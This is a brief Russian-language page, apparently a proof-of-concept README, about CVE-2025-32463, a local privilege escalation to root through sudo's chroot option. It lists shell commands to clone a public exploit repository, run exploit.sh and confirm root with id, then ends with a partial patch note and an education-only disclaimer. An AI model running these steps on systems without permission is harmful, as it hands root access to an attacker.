
Локальное повышение привилегий до root через Sudo chroot в Linux
Локальное повышение привилегий до root через sudo chroot в Linux
CVE-2025-32463 — это уязвимость локального повышения привилегий в бинарном файле Sudo. Ошибка позволяет локальному пользователю повысить привилегии до root при определённых неправильных конфигурациях или с помощью специально созданных входных данных. Проблема была обнаружена Rich Mirch.
Злоумышленник с низкими привилегиями может использовать эту уязвимость для получения root-доступа, полностью скомпрометировав систему.
git clone https://github.com/kh4sh3i/CVE-2025-32463.git
cd CVE-2025-32463
chmod +x exploit.sh
id
./exploit.sh
id
sudo до последней исправленной версии.Этот PoC предоставляется только в образовательных и исследовательских целях. Запуск этого на любой системе без разрешения является незаконным и неэтичным.